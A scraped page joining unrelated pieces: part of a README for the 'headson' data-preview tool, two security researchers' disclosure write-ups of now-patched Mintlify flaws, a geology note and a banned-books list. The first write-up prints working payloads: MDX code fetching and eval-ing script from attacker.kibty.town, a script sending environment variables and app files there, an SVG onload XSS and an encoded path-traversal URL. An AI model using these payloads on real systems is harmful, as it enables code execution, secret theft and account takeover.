- Auto: stdin → JSON family; multi-file mode → per‑file based on extension ( .json → JSON family, .yaml / .yml → YAML, unknown → Text).
-t, --template <strict|default|detailed> : output style (default: default ).
- JSON family: strict → strict JSON; default → Pseudo; detailed → JS with inline comments.
- YAML: always YAML; style only affects comments ( strict none, default “# …”, detailed “# N more …”).
-i, --input-format <json|yaml|text> : ingestion format (default: json ). In multi-file mode with --format auto , ingestion is chosen by extensions.
-m, --compact : no indentation, no spaces, no newlines
--no-newline : single line output
--no-header : suppress per-file section headers (useful when embedding output in scripts)
--tree : render multi-file previews as a directory tree with inline previews (keeps code line numbers); uses per-file auto formatting.
--no-space : no space after : in objects
--indent <STR> : indentation unit (default: two spaces)
--string-cap <N> : max graphemes to consider per string (default: 500)
--grep <REGEX> : guarantee inclusion of values/keys/lines matching the regex (ripgrep‑style). Matches + ancestors are “free” against both global and per-file caps; budgets apply to everything else. If matches consume all headroom, only the must‑keep path is shown. Colors follow the normal on/auto/off rules; when grep is active, syntax colors are suppressed and only the match highlights are colored. JSON/YAML structural punctuation is not highlighted—only the matching key/value text.
--head : prefer the beginning of arrays when truncating (keep first N). Strings are unaffected. Display styles place omission markers accordingly; strict JSON remains unannotated. Mutually exclusive with --tail .
--tail : prefer the end of arrays when truncating (keep last N). Strings are unaffected. Display styles place omission markers accordingly; strict JSON remains unannotated. Mutually exclusive with --head .

Notes:

Multiple inputs:
- With newlines enabled, file sections are rendered with human‑readable headers (pass --no-header to suppress them). In compact/single‑line modes, headers are omitted.
- Order: in git repos, files are ordered so frequently and recently touched files show up first, with mtime fallback; pass --no-sort to keep the original input order without repo scanning.
- Fairness: file contents are interleaved round‑robin during selection so tight budgets don’t starve later files.
In --format auto , each file uses its own best format: JSON family for .json , YAML for .yaml / .yml .
- Unknown extensions are treated as Text (raw lines) — safe for logs and .txt files.
- --global-bytes may truncate or omit entire files to respect the total budget.
- Directories and binary files are ignored; a notice is printed to stderr for each. Stdin reads the stream as‑is.
- Head vs Tail sampling: these options bias which part of arrays are kept before rendering; strict JSON stays unannotated.

Multi-file mode

Budgets: per-file caps ( --bytes / --chars / --lines ) apply to each input; global caps ( --global-* ) constrain the combined output when set. Default byte/char budgets scale by input count when no globals are set; line caps stay per-file unless you pass --global-lines .
One metric per level: pick at most one per-file budget flag ( --bytes | --chars | --lines ) and at most one global flag ( --global-bytes | --global-lines ). Mixing per-file and global kinds is allowed (e.g., per-file lines + global bytes); conflicting flags error.
Sorting: inputs are ordered so frequently and recently touched files appear first (git metadata when available, mtime fallback). Pass --no-sort to preserve the order you provided and skip repo scanning.
Headers: multi-file output gets ==> headers when newlines are enabled; hide them with --no-header . Compact and single-line modes omit headers automatically.
Formats: in --format auto , each file picks JSON/YAML/Text based on extension; unknowns fall back to Text so mixed inputs “just work.”
Per-file caps: omission markers count toward per-file line budgets; a per-file line cap of zero suppresses the file entirely, even when headers are counted.

Grep mode

Use --grep <REGEX> to guarantee inclusion of values/keys/lines matching the regex (ripgrep-style). Matches plus their ancestors are “free” against budgets; everything else must fit the remaining headroom.

Matching: values/lines are checked; object keys match too. Filenames do not match by themselves (a file must have a matching value/line/key).
Colors: only the matching text is highlighted; syntax colors are suppressed in grep mode. Disable color entirely with --no-color .
Weak grep: --weak-grep <REGEX> biases priority toward matches but does not guarantee inclusion, expand budgets, or filter files. Budgets stay exact and matches can still be pruned if they do not fit.
Multi-file mode (strong --grep only):
- Default ( --grep-show=matching ): files without matches are dropped from the render and summary. If no files match at all, the output is empty and the CLI prints a notice to stderr.
- --grep-show=all : keep non-matching files in the render; only matching files are highlighted.
- Headers respect --no-header as usual.
Mutual exclusion: --grep-show requires --grep and cannot be used with --weak-grep ; --weak-grep cannot be combined with --grep .
Context: there are no explicit -C/-B/-A style flags; per-file budgets decide how much surrounding structure/lines can stay alongside the must-keep matches.
Budgets: matches and ancestors always render; remaining budget determines what else can appear. Extremely tight budgets may show only the must-keep path.
Text/source code: works with -i text and source code files; when using --format auto , file extensions still decide ingest/rendering.

Tree mode

Use --tree to render multi-file output as a directory tree (like tree ) with inline structured previews instead of per-file headers. Works with grep/weak-grep; matches are shown inside the tree.

Layout: classic tree branches ( ├─ , │ , └─ ) with continuous guides; code gutters stay visible under the tree prefix.
Headers: --tree is mutually exclusive with --no-header ; tree mode never prints ==> headers and relies on the tree structure instead. Files are still auto-formatted per extension ( --format must be auto in multi-file mode).
Budgets: tree scaffolding is treated like headers (free unless you set --count-headers ); per-file budgets always apply to file content and omission markers, and global caps apply only when provided. Tight budgets can truncate file previews within the tree, and entire files may be omitted under tiny global line budgets—omitted entries are reported as … N more items on the relevant folder/root. When scaffold is free, the final output can exceed the requested caps by the tree gutters/indentation; set --count-headers if those characters must be bounded.
Empty sections: under very small per-file caps (or a tiny global cap, if set), files or code blocks may render only their header/tree entry with no body; omission markers appear only when at least one child fits. This is expected when nothing fits beneath the budget.
Sorting: respects --no-sort ; otherwise uses the usual repo-aware ordering (frequent+recent first; mtime fallback) before tree grouping.
Fairness: file contents are interleaved round‑robin in the priority order so later files still surface under tight budgets.

Budget modes

Bytes ( -c/--bytes , -C/--global-bytes )
- Measures UTF‑8 bytes in the output.
- Default per‑file budget is 500 bytes when neither --lines nor --chars is provided.
- Multiple inputs: total default budget is <BYTES> * number_of_inputs ; --global-bytes caps the total.
Characters ( -u/--chars )
- Measures Unicode code points (not grapheme clusters).
Lines ( -n/--lines , -N/--global-lines )
- Caps the number of lines in the output.
- Incompatible with --no-newline .
- Multiple inputs: <LINES> is enforced per file; add --global-lines if you also need an aggregate cap.
- Per-file headers, blank separators, and summary lines do not count toward the line cap by default; only actual content lines are considered. Pass -H/--count-headers to include headers/summaries in the line budget.
- Tiny caps may yield omission markers instead of bodies (e.g., … for text/code, {…} / […] for objects/arrays); a single-line file still renders when it fits.
Interactions and precedence
- All active budgets are enforced simultaneously. The render must satisfy all of: bytes (if set), chars (if set), and lines (if set). The strictest cap wins.
- Outputs stay non-empty unless you explicitly set a per-file cap of zero; in that case that slot can be suppressed entirely (matching the CLI’s -n 0 semantics). Extremely tight nonzero caps that cannot fit even an omission marker can also yield empty output; multi-file/tree output may show only omission counts in that scenario.
- When only lines are specified, no implicit byte cap applies. When neither lines nor chars are specified, a 500‑byte default applies.

Text mode

Single file (auto):

Force Text ingest/output (useful when mixing with other extensions, or when the extension suggests JSON/YAML):

hson -c 200 -i text -f text notes.txt
# Force text ingest even if the file looks like JSON
hson -i text notes.json

Styles on Text:
- default: omission as a standalone … line.
- detailed: omission as … N more lines … .
- strict: no array‑level omission line (individual long lines may still truncate with … ).

Note: In multi-file mode, each file uses its own auto format/template. When you need to preview a directory of mixed formats, skip -f text and let -f auto pick the right renderer for each entry.

Source code support

For source code files, headson uses an indentation-aware heuristic to build an outline, then samples representative lines from across that structure.

Lines are kept atomic: omission markers never split a line in half.
Under tight budgets, it tends to keep block-introducing lines (like function/class headers) and omit less relevant blocks from the middle.
With colors enabled, you also get syntax highlighting and line numbers.

Show help:

Note: flags align with head/tail conventions ( -c/--bytes , -C/--global-bytes ).

What’s wrong with just using head/tail?

Input:

{"users":[{"id":1,"name":"Ana","roles":["admin","dev"]},{"id":2,"name":"Bo"}],"meta":{"count":2,"source":"db"}}

If you head -c a JSON file/stream, you can cut it in the middle of a value and end up with a confusing snippet:

head -c 80 users.json
# {"users":[{"id":1,"name":"Ana","roles":["admin","dev"]},{"id":2,"name":"Bo"}],"me

With hson , you still get a compact preview, but it stays structure-aware:

hson -c 120 -f json -t default users.json
# {
#   users: [
#     { id: 1, name: "Ana", roles: [ "admin", … ] },
#     …
#   ]
#   meta: { count: 2, … }
# }

If you need machine-readable output, use strict mode:

hson -c 120 -f json -t strict users.json
# {"users":[{"id":1,"name":"Ana","roles":["admin"]}],"meta":{"count":2}}

Python Bindings

A thin Python extension module is available on PyPI as headson .

Install

pip install headson (ABI3 wheels for Python 3.10+ on Linux/macOS/Windows).

Usage

API:

headson.summarize(text: str, *, format: str = "auto", style: str = "default", input_format: str = "json", byte_budget: int | None = None, skew: str = "balanced") -> str
- format : "auto" | "json" | "yaml" (auto maps to JSON family for single inputs)
- style : "strict" | "default" | "detailed"
- input_format : "json" | "yaml" (ingestion)
- byte_budget : maximum output size in bytes (default: 500)
- skew : "balanced" | "head" | "tail" (affects display styles; strict JSON remains unannotated)

Examples:

import json
import headson

data = {"foo": [1, 2, 3], "bar": {"x": "y"}}
preview = headson.summarize(json.dumps(data), format="json", style="strict", byte_budget=200)
print(preview)

# Prefer the tail of arrays (annotations show with style="default"/"detailed")
print(
    headson.summarize(
        json.dumps(list(range(100))),
        format="json",
        style="detailed",
        byte_budget=80,
        skew="tail",
    )
)

# YAML support
doc = "root:\n  items: [1,2,3,4,5,6,7,8,9,10]\n"
print(headson.summarize(doc, format="yaml", style="default", input_format="yaml", byte_budget=60))

Algorithm

Footnotes

^[1] Optimized tree representation : An arena‑style tree stored in flat, contiguous buffers. Each node records its kind and value plus index ranges into shared child and key arrays. Arrays are ingested in a single pass and may be deterministically pre‑sampled: the first element is always kept; additional elements are selected via a fixed per‑index inclusion test; for kept elements, original indices are stored and full lengths are counted. This enables accurate omission info and internal gap markers later, while minimizing pointer chasing.
^[2] Priority order : Nodes are scored so previews surface representative structure and values first. Arrays can favor head/mid/tail coverage (default) or strictly the head; tail preference flips head/tail when configured. Object properties are ordered by key, and strings expand by grapheme with early characters prioritized over very deep expansions.
^[3] Choose top N nodes (binary search) : Iteratively picks N so that the rendered preview fits within the byte budget, looping between “choose N” and a render attempt to converge quickly.
^[4] Render attempt : Serializes the currently included nodes using the selected template. Omission summaries and per-file section headers appear in display templates (pseudo/js); json remains strict. For arrays, display templates may insert internal gap markers between non‑contiguous kept items using original indices.
^[5] Diagram source : The Algorithm diagram is generated from docs/diagrams/algorithm.mmd . Regenerate the SVG with cargo make diagrams before releasing.

Comparison with alternatives

head / tail : byte/line-based, so output often breaks structure in JSON/YAML or surfaces uninteresting details.
jq : powerful, but you usually need to write filters to get a compact preview of large JSON.

License

MIT

How to hack Discord, Vercel and more with one easy trick

Hacker News

kibty.town

2025-12-18 19:41:24

Comments...

Original Article

this blogpost was a collaboration with two people, their articles are here: hackermon and mdl

this started when i was notified that discord switched documentation platforms to mintlify , a company i briefly looked into before, and i thought it would be a good idea to take another look now that theyre bigger.

introduction

mintlify is a b2b saas documentation platform that allows companies to make documentation via MDX files and they host it for them, and add styling, etc.

some of their customers would include:

discord
twitter
vercel
cursor

...and more, you can view a full list here

theres also a bunch of ai features and stuff, but thats beyond the point

so, i signed up and got to digging.

the rce (CVE-2025-67843)

mintlify uses MDX to render docs their customers provide, and i was wondering how they render it on the server-side for static page generation (because a docs site needs that for search engines/bots).

this is because mdx is basically jsx (think react) combined with markdown, meaning you can add js expressions to your markdown. so whats preventing us from making a jsx expression that evaluates code on the server?

well, i tried it with a simple payload to just eval things from a webserver

{!!fetch("https://attacker.kibty.town").then((r) => r.text()).then((c) => eval(c))}

i deployed it to mintlify and went to the page it was on, and i got a request from a vercel/amazon ip! are they really doing this on their nextjs app?

i wrote a simple script to exfilitrate some data such as the process.env (and app files) to find out:

const exfil = (data) =>
  fetch("https://attacker.kibty.town", {
    method: "POST",
    body: JSON.stringify(data),
  });
exfil({ files: [{ name: ".env.json", content: JSON.stringify(process.env) }] });
try {
  import("fs").then(async (a) => {
    const arr = [];
    for (const filename of a.readdirSync(".", { recursive: true })) {
      if (a.lstatSync(filename).isDirectory()) continue;
      const content = a.readFileSync(filename, "utf-8");
      arr.push({ name: filename, content });
    }
    console.log(arr.length);
    await exfil({ files: arr });
    console.log("done exfiling");
  });
} catch (error) {
  exfil(error);
}

and, after running it, this is what i got:

shit. this is bad, we have full access.

impact

i quickly realised that this was the server-side serverless (lol) environment of their main documentation app, while this calls to a external api to do everything, we have the token it calls it with in the env.

alongside, we can poison the nextjs cache for everyone for any site , allowing mass xss, defacing, etc on any docs site.

we can also pretend nonexistent pages exist in the cache, allowing targeted xss too

with the other keys we could also:

poisoned mintlifys analytics
ruined mintlifys feature flagging
dos'ed customer sites via path validations
trigger a bunch of pdf exports which would jack up mintlifys cloudconvert bill

so:

mass xss (on customer domains)
targeted xss (on custom domains)

very bad.

targeted xss (CVE-2025-67842)

after getting all of the server routes, i noticed a interesting one: /_mintlify/static/[subdomain]/{...path} . this route seemed to allow you to get static images from your repository, such as svgs, pngs, etc.

what if i could access my organizations asset from another domain?

well i tried, i crafted a url that looked like

https://discord.com/_mintlify/static/evascoolcompany/xss.svg

which, the svg on my repository having this content:

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(window.origin);"/>

and when i went to the url, i got this:

well, fuck.

impact

this allows complete 1 click xss on users who click a link. definitely not great, but it makes the fact worse that most companies dont properly scope cookies, or have their documentation on a subpath (such as /path ).

the latter was true in discords case, their documentation was on /developers/docs , and i can just get the token value from localstorage directly, and exfiltrate it using whatever i want

some other companies that i could do full exploitation on are twitter, vercel and cursor. though we did not check many companies and there is definitely more

an unexpected message

a few hours after i started looking into this, i got an unexpected, sort of out of nowhere message from a friend, hackermon , who had found the targeted xss independently aswell

we started looking into this together, alongside mdl , who was also looking into it with hackermon

also checkout their blogposts here and here! (respectively)

we also got in contact with mintlify, and started disclosing everything we already had and future things directly to them

here comes the patch bypass (CVE-2025-67845)

after mintlify patched the targeted xss via static, i was looking at the code for the route and had an idea

the code for the endpoint looked like this (not exact, recreation):

export async function GET(_, { params }) {
  const { subdomain, path: pathParts } = await params;
  const path = "/" + pathParts.join("/");

  const url = `${CDN_BASE_URL}/${subdomain}${path}`;
  const res = await fetch(url);

  if (!res.ok)
    return new NextResponse("Asset not found", {
      status: 404,
    });

  return res; // inaccurate, does more operations but we simply dont care about them here
}

and i realised, nothing prevents us from adding url encoded path traversal in a part of a path, to climb up the cdn path

so i crafted a url and tested, it looked like

https://discord.com/_mintlify/static/discord/images/create-team-owned-app.png%2F..%2F..%2F..%2Fevascoolcompany%2Fxss.svg

and i was met with the beautiful alert page again

always remember to encode your paths properly!

non-critical vulnerabilities

alongside this, i found a few non-critical vulnerabilties which don't deserve an entire section, so here they are:

github idor (CVE-2025-67844): mintlify doesn't validate the github repository owner/name fields on their api while your setting it, allowing you to set it to any authorized repository. allowing you to view commit details (message, hash, filename, files changed, etc) for new commits
downgrade attack (CVE-2025-67846): mintlify uses vercel to facilitate deployments of both their client and the dashboard. a common pitfall when using vercel is that you fail to remove a previous deployment with a vulnerability in it, so you can target a specific previous vulnerable deployment id / git branch / git ref, and use that to facilitate the patched exploit.

add it to your repository, wait for the deployment to build and access it on any mintlify-provided documentation/custom domain with the path /_mintlify/static/evascoolcompany/xss.svg or similar with prefixes

lets talk impact (again)

all together, i think this series of vulnerabilities had very big impact. considering we could supply chain attack various big fortune 500 companies, including but not limited to:

discord
twitter
vercel
cursor

...and more, you can view a full list here

we could on targeted companies:

override pages on docs to deface, or xss
get 1 click xss
view commits or push to repositories

the patch

after we got in contact with mintlify, everything was patched very swiftly. and i was awarded 5,000 USD for my efforts and findings.

the patches for the vulnerabilties were:

the rce (CVE-2025-67843): not parsing non-simple mdx expressions on ssr, but still parsing on client
targeted xss (CVE-2025-67842): you are now not able to reach any mintlify assets that are not on the same organization
targeted xss patch bypass (CVE-2025-67845): theres now checks to make sure you aren't path traversing the cdn path
github idor (CVE-2025-67844): its now checked on setting github repository that the github app installation registered to your mintlify account has access to the specified repository
downgrade attack (CVE-2025-67846): theres now a visitor password on preview deployments on vercel and purging old deployments that were vulnerable, you can read the vercel documentation on this here

make sure to check out hackermon and mdl 's reports for more details on other vulnerabilties, and the possible exploitation that couldve happened.

card by marshift

The Scottish Highlands, the Appalachians, Atlas are the same mountain range

Hacker News

vividmaps.com

2025-12-18 19:15:17

Comments...

Original Article

The Central Pangean Mountains were a great mountain chain in the middle part of the supercontinent Pangaea that stretches across the continent from northeast to southwest during the Carboniferous, Permian Triassic periods. The ridge was formed as a consequence of a collision between the supercontinents Laurussia and Gondwana during the formation of Pangaea . It was similar to the present Himalayas at its highest elevation during the beginning of the Permian period.

It’s hard to imagine now that once upon a time that the Scottish Highlands , the Appalachians , the Ouachita Mountains , and the Little Atlas of Morocco are the same mountain range, once connected as the Central Pangean Mountains.

During the Permian period, the Central Pangean were subjected to significant physical weathering, decreasing the peaks and forming many deep intermontane plains. By the Middle Triassic, the mountain sierras had been considerably reduced in size. By the beginning of the Jurassic period (200 mln years ago), the Pangean chain in Western Europe disappeared to some highland regions separated by deep marine basins.

We pwned X, Vercel, Cursor, and Discord through a supply-chain attack

Hacker News

gist.github.com

2025-12-18 19:08:48

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Original Article

How we pwned X (Twitter), Vercel, Cursor, Discord, and hundreds of companies through a supply-chain attack

hi, i'm daniel. i'm a 16-year-old high school senior. in my free time, i hack billion dollar companies and build cool stuff.

about a month ago, a couple of friends and I found serious critical vulnerabilities on Mintlify, an AI documentation platform used by some of the top companies in the world.

i found a critical cross-site scripting vulnerability that, if abused, would let an attacker to inject malicious scripts into the documentation of numerous companies and steal credentials from users with a single link open.

(go read my friends' writeups (after this one))
how to hack discord, vercel, and more with one easy trick (eva)
Redacted by Counsel: A supply chain postmortem (MDL)

here's my story...

My story begins on Friday, November 7, 2025, when Discord announced a brand new update to their developer documentation platform. They were previously using a custom built documentation platform, but were switching to an AI-powered documentation platform.

Discord is one of my favorite places to hunt for vulnerabilities since I'm very familiar with their API and platform. I'm at the top of their bug bounty leaderboard having reported nearly 100 vulnerabilities over the last few years. After you've gone through every feature at least 10 times, it gets boring.

I found this new update exciting, and as soon as I saw the announcement, I started looking through how they implemented this new documentation platform.

Mintlify

Mintlify is an AI-powered documentation platform. You write your documentation as markdown and Mintlify turns it into a beautiful documentation platform with all the modern features a documentation platform needs. (Despite the vulnerabilities we found, I would highly recommend them. They make it really easy to create beautiful docs that work.)

Mintlify-hosted documentation sites are on the *.mintlify.app domains, with support for custom domains. In Discord's case, they were just proxying certain routes to their Mintlify documentation at discord.mintlify.app .

Every Mintlify subdomain has a /_mintlify/* path that is used internally on the platform to power certain features. Regardless of whether it's hosted through the mintlify.app domain or a custom domain, the /_mintlify path must be accessible to power the documentation.

(For example, the /api/user path for authentication: https://docs.x.com/_mintlify/api/user , https://discord.com/_mintlify/api/user , etc)

`/_mintlify/markdown/`

After Discord switched to Mintlify and when I started looking for bugs on the platform, from the get-go, my plan was to find a way to render another Mintlify documentation through Discord's domain.

At first, I tried path traversal attacks, but they didn't work. Then, I started looking through the /_mintlify API endpoints.

Using Chrome DevTools to search the assets, I found the endpoint /_mintlify/_markdown/_sites/[subdomain]/[...route] . It accepted any Mintlify documentation ( [subdomain] ) and it returned a file from that specific documentation ( [...route] ). The endpoint didn't check to make sure the [subdomain] matched with the current host, which means you could fetch files from any Mintlify documentation on an host with the /_mintlify/ route.

Unfortunately, this endpoint only returned raw markdown text. The markdown wasn't rendered as HTML, meaning it was impossible to run code. I spent the rest of the time trying different ways to bypass this, but nothing worked.

`/_mintlify/static/`

Fast forward 2 days to Sunday, November 9, 2025, I went back to hunting.

I was confident there was another endpoint, like the markdown one, which could fetch and return cross-site data, but I couldn't find one. I tried searching web assets and some other techniques, but I couldn't find the endpoint I was looking for.

Finally, I decided to look through the Mintlify CLI. Mintlify lets you run your documentation site locally via their npm package (@mintlify/cli). I realized that this probably meant the code powering the documentation platform was somewhat public.

After digging through the package and downloading tarballs linked in the code, I found myself at exactly what I was looking for.

Jackpot!

This was a list of application endpoints (compiled by Nextjs), and in the middle, there's the endpoint /_mintlify/static/[subdomain]/[...route] .

Like the markdown endpoint, this endpoint accepted any Mintlify documentation ( [subdomain] ). The only difference was this endpoint returned static files from the documentation repo.

First, I tried accessing HTML and JavaScript files but it didn't work; I realized there was some sort of whitelist of file extensions. Then, I tried an SVG file, and it worked.

If you didn't know, you can embed JavaScript into an SVG file. The script doesn't run unless the file is directly opened (you can't run scripts from ( <img src="/image.svg"> ). This is very common knowledge for security researchers.

I created an SVG file with an embedded script, uploaded it to my Mintlify documentation, and opened the endpoint through Discord ( https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lmao.svg ). It worked!

Collaboration

XSS attacks are incredibly rare on Discord, so I shared it with a couple friends.

I sent a screenshot to xyzeva, only to find out she had also been looking into Mintlify after the Discord switch. She had previously discovered other vulnerabilities on the Mintlify platform, and had found more that she was preparing to disclose ( go read her writeup! ). I find it funny we had both separately been looking into Mintlify and found very different, but very critical bugs.

Another friend joined, and we created a group chat.

Reporting

We reported the vulnerability to Discord and attempted to contact Mintlify through an employee.

Discord took this very seriously, and closed off its entire developer documentation for 2 hours while investigating the impact of this vulnerability. Then, they reverted to their old documentation platform and removed all the Mintlify routes. https://discordstatus.com/incidents/by04x5gnnng3

Mintlify contacted us directly very shortly after hearing about the vulnerability through Discord. We set up a Slack channel with Mintlify's engineering team and got to work. Personally, this cross-site scripting attack was the only thing I had the time to find; eva and MDL worked with Mintlify's engineering team to quickly remediate this and other vulnerabilities they found on the platform.

Impact

In total, the cross-site scripting attack affected almost every Mintlify customer. To name a few: X (Twitter), Vercel, Cursor, Discord, and more .

These customers host their documentation on their primary domains and were vulnerable to account takeovers with a single malicious link.

Conclusion

Fortunately, we responsibly found and disclosed this vulnerability but this is an example of how compromising a single supply chain can lead to a multitude of problems.

In total, we collectively recieved ~$11,000 in bounties. Discord paid $4,000 and Mintlify individually gave us bounties for the impact of the bugs we individually found.

Top Banned Books: The Most Banned Books in U.S. Schools – Pen America

Hacker News

pen.org

2025-12-18 19:02:22

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Original Article

A row of young adult and diverse-themed books stands upright on a wooden surface, including titles by John Green, Jodi Picoult, Ellen Hopkins, Neal Shusterman, and several novels by S.J. Maas.

The 52 most banned books of the last four school years include National Book Award and Pulitzer Prize winners, bestsellers, and beloved books by authors including Toni Morrison, Margaret Atwood, and Judy Blume.

Since PEN America began tallying school book bans in 2021, thousands of books have been targeted repeatedly – as many as 147 times for John Green’s popular young adult novel Looking for Alaska and 142 for bestselling author Jodi Picoult’s book centered around a school shooting, Nineteen Minutes . Seven of bestselling author Sarah J. Maas’ books appear in the top 52, along with seven by young adult author Ellen Hopkins.

PEN America has documented 22,810 cases of book bans in U.S. public schools since it began counting in 2021, wiping out everything from classic literature to children’s picture books. Bans have occurred in 45 states and 451 public school districts.

Censorship proponents frequently frame their movement as a drive to remove “porn” from schools, but many of the most banned books don’t contain so much as a kiss. Instead, many explore themes of race and racism or reflect LGBTQ+ identities, particularly those of the transgender community. Others reflect the realities of sexual abuse and violence , something far too many children experience outside the pages of a book.

If groups pushing censorship consider widely read classics indecent, if they can come for the likes of John Green and Toni Morrison, is anything off limits?

See the most banned books in 2025 , the most banned authors in 2025 , and PEN America’s Index of School Book Bans .

Most Banned Books 2021-2025

1. Looking for Alaska , by John Green. 147 bans.

“Looking for Alaska brilliantly chronicles the indelible impact one life can have on another. A modern classic, this stunning debut marked bestselling author John Green’s arrival as a groundbreaking new voice in contemporary fiction.”

Michael L. Printz Award winner
New York Timesbestseller
NPR’s Top Ten Best-Ever Teen Novels
TIME magazine’s 100 Best Young Adult Novels of All Time
TV miniseries

2. Nineteen Minutes , by Jodi Picoult. 142 bans.

Jodi Picoult, bestselling author of My Sister’s Keeper and Small Great Things, writes about the moments leading up to and the devastating aftermath of a school shooting.

#1 New York Times bestseller
Award-winning author
American Library Association Outstanding Books for the College Bound and Lifelong Learners

3. Sold , by Patricia McCormick. 136 bans.

McCormick tells the story of Lakshmi, a 13-year-old girl in Nepal who is sold into prostitution. “The powerful, poignant, bestselling National Book Award Finalist gives voice to a young girl robbed of her childhood yet determined to find the strength to triumph.”

National Book Award finalist
Publishers Weekly and NPR Best Books of the Year

4. The Perks of Being a Wallflower , by Stephen Chbosky. 135 bans.

In this coming-of-age novel, “wallflower” Charlie deals with the complexities of high school, from young love to the pain of losing loved ones.

#1 New York Times bestseller
American Library Association Best Book for Young Adults and Best Book for Reluctant Readers
Major motion picture

5. Crank , by Ellen Hopkins. 128 bans.

“Kristina Snow is the perfect daughter: gifted high school junior, quiet, never any trouble. Then, Kristina meets the monster: crank. And what begins as a wild, ecstatic ride turns into a struggle through hell for her mind, her soul–her life.”

#1 New York Times bestseller

6. Thirteen Reasons Why , by Jay Asher. 126 bans.

“Clay Jensen returns home from school to find a strange package with his name on it lying on his porch. Inside he discovers several cassette tapes recorded by Hannah Baker–his classmate and crush–who committed suicide two weeks earlier.”

New York Times bestseller
Netflix movie

7. Tricks , by Ellen Hopkins. 120 bans.

“Five troubled teenagers fall into prostitution as they search for freedom, safety, community, family, and love in this No. 1 New York Times bestselling novel from Ellen Hopkins.”

New York Times bestseller

8. The Bluest Eye , by Toni Morrison. 116 bans.

“From the acclaimed Nobel Prize winner—a powerful examination of our obsession with beauty and conformity that asks questions about race, class, and gender with characteristic subtly and grace.”

Nobel Prize-winning author
Pulitzer Prize-winning author
PEN/Saul Bellow Award for Achievement in American Fiction
A Parade best book of all time

9. The Kite Runner , by Khaled Hosseini. 115 bans.

“The unforgettable, heartbreaking story of the unlikely friendship between a wealthy boy and the son of his father’s servant, caught in the tragic sweep of history.”

No. 1 New York Times bestselling novel
New York Times Readers Pick: 100 Best Books of the 21st Century
Major motion picture and Broadway play

10. A Court of Mist and Fury , by Sarah J. Maas. 112 bans.

Sarah J. Maas, who skyrocketed to fame with the help of BookTok, was the third most frequently banned author of the 2024-25 school year, according to PEN America’s Index of School Book Bans. This follow-up to A Court of Thorns and Roses offers romance, fantasy, magic, and political intrigue.

#1 bestseller
Goodreads Choice Award winner

11. Identical , by Ellen Hopkins. 110 bans.

“Beneath their perfect family façade, twin sisters struggle alone with impossible circumstances and their own demons until they finally learn to fight for each other.”

New York Times bestselling author

12. The Handmaid’s Tale , by Margaret Atwood. 106 bans.

In the near future, Offred is a handmaid in an authoritarian society who is not permitted to read. We’ll let that sink in.

Modern classic
Award-winning author

13. Water for Elephants , by Sara Gruen. 101 bans.

With more than 10,000 copies in print, this bestselling novel was the basis of a movie and a Broadway show.

No. 1 New York Times Bestseller

14. All Boys Aren’t Blue , by George M. Johnson. 100 bans.

“In a series of personal essays, prominent journalist and LGBTQIA+ activist George M. Johnson’s All Boys Aren’t Blue explores their childhood, adolescence, and college years in New Jersey and Virginia.”

New York Times bestseller
Goodreads Choice Award winner
Kirkus Reviews Best Books of 2020

15 (tie). The Absolutely True Diary of a Part-Time Indian , by Sherman Alexie. 99 bans.

“Bestselling author Sherman Alexie tells the story of Junior, a budding cartoonist growing up on the Spokane Indian Reservation. Determined to take his future into his own hands, Junior leaves his troubled school on the rez to attend an all-white farm town high school where the only other Indian is the school mascot.”

National Book Award for Young People’s Literature

15 (tie). Empire of Storms , by Sarah J. Maas. 99 bans.

War is brewing in the fifth book in this complete, #1 bestselling Throne of Glass series by Sarah J. Maas.

Bestselling author

**15 (tie). A Court of Thorns and Roses , by Sarah J. Maas. 99 bans.**

The first book in the Court of Thorns and Roses series introduces 19-year-old huntress Feyre as she is dragged to a magical land of faeries and finds herself developing feelings for her captor.

#1 New York Times bestselling series

18. Out of Darkness , by Ashley Hope Pérez. 98 bans.

“A dangerous forbidden romance rocks a Texan oil town in 1937, when segregation was a matter of life and death.”

Printz Honor Book
Booklist 50 Best YA Books of All Time

19. Gender Queer: A Memoir , by Maia Kobabe. 94 bans.

“Started as a way to explain to eir family what it means to be nonbinary and asexual, Gender Queer is more than a personal story: it is a useful and touching guide on gender identity–what it means and how to think about it–for advocates, friends, and humans everywhere.”

ALA Alex Award Winner
Stonewall-Israel Fishman Non-fiction Award Honor Book

20. A Court of Wings and Ruin , by Sarah J. Maas. 92 bans.

The third novel in the bestselling Court of Thorns and Roses series finds Feyre struggling to master her powers as war bears down.

No. 1 bestselling author

21. Me and Earl and the Dying Girl , by Jesse Andrews. 87 bans.

“This is the funniest book you’ll ever read about death. … Fiercely funny, honest, heart-breaking–this is an unforgettable novel from a bright talent, now also a film that critics are calling ‘a touchstone for its generation’ and ‘an instant classic.’”

New York Times bestseller
Adapted into a film

**22 (tie). The Hate U Give , by Angie Thomas. 85 bans.**

“Sixteen-year-old Starr Carter moves between two worlds: the poor neighborhood where she lives and the fancy suburban prep school she attends. The uneasy balance between these worlds is shattered when Starr witnesses the fatal shooting of her childhood best friend Khalil at the hands of a police officer. Khalil was unarmed.”

National Book Award Longlist
Printz Honor
Coretta Scott King Honor
New York Times bestseller
Adapted into a film

22 (tie). A Court of Frost and Starlight , by Sarah J. Maas. 85 bans.

Bridging the events of A Court of Wings and Ruin and A Court of Silver Flames, this book explores the far-reaching effects of a devastating war and the fierce love between friends.

#1 New York Times bestselling series

24. Lucky , by Alice Sebold. 83 bans.

Alice Sebold’s 1999 memoir describes the sexual assault she suffered as an 18-year-old college student. After the man convicted of the crime was exonerated in 2021, publisher Scribner said distribution of the book would cease while they determined how to revise it.

25. Tilt , by Ellen Hopkins. 81 bans.

Love stories for three teens cause their worlds to tilt as they grapple with problems including pregnancy and HIV.

No. 1 New York Times bestselling author

26. Beloved , by Toni Morrison. 77 bans.

The Pulitzer Prize-winning book from Morrison tells the story of Sethe, who was born a slave and escaped but is haunted by memories and the ghost of her baby, whose tombstone bears a single word: Beloved.

Pulitzer Prize
Nobel Prize-winning author
Bestseller

27. Living Dead Girl , by Elizabeth Scott. 72 bans.

The story of a girl who was abducted at 10, still trapped five years later with a menacing captor.

28. Forever… , by Judy Blume. 71 bans.

Judy Blume’s 1975 Young Adult novel has been a target of censorship for 50 years. Blume has said she wrote it because her daughter wanted to read something where kids could have sex “without either of them having to die.”

National Book Foundation Medal-winning author
NPR 100 Best-Ever Teen Novels
Time Magazine 100 Best YA Books of All Time

29. Damsel , by Elana K. Arnold. 70 bans.

In this dark fairy tale, a damsel who is rescued from a fierce dragon by a handsome prince discovers that all is not what it seems.

